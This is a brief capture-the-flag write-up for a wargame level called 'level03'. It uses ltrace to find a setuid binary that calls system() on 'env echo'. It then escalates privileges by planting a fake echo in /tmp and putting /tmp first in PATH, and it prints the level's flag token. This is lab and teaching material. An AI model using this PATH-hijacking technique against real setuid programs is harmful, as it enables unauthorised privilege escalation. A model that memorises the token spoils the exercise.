`ls`
level03
`./level03`
"Exploit me"

Use ltrace to take a look at the functions called inside the executable
`ltrace ./level03`
__libc_start_main(0x80484a4, 1, 0xbffff7f4, 0x8048510, 0x8048580 <unfinished ...>
getegid()                                                                                     = 2003
geteuid()                                                                                     = 2003
setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280)                                           = 0
setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280)                                           = 0
system("/usr/bin/env echo Exploit me"Exploit me
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                        = 0
+++ exited (status 0) +++

the function  "system()" which executes a shell commands (echo Exploit me)
write a simple program called echo and make it execute 'getflag'. Due to permission use the /tmp folder to create it
`gcc /tmp/echo.c -o echo`
`export PATH=/tmp:$PATH` folder in front of the current PATH variable, ensuring it will be the first path used to search for the executables
`./level03`
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus

